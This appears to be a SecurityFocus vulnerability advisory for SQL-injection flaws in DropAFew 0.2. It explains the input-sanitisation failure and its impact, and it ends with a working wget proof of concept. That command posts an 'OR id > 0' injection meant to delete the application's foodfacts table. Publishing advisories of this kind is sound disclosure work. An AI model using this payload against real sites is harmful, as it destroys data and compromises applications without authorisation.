10 lines
No EOL
610 B
Text
10 lines
No EOL
610 B
Text
source: http://www.securityfocus.com/bid/23400/info
|
|
|
|
DropAFew is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
|
|
|
|
These issues affect DropAFew 0.2; prior versions may also be affected.
|
|
|
|
# delete foodfacts table
|
|
wget --load-cookies cookies --post-data='id=1%20OR%20id%20>%200--&action=del' http://[target]/calorie/search.php |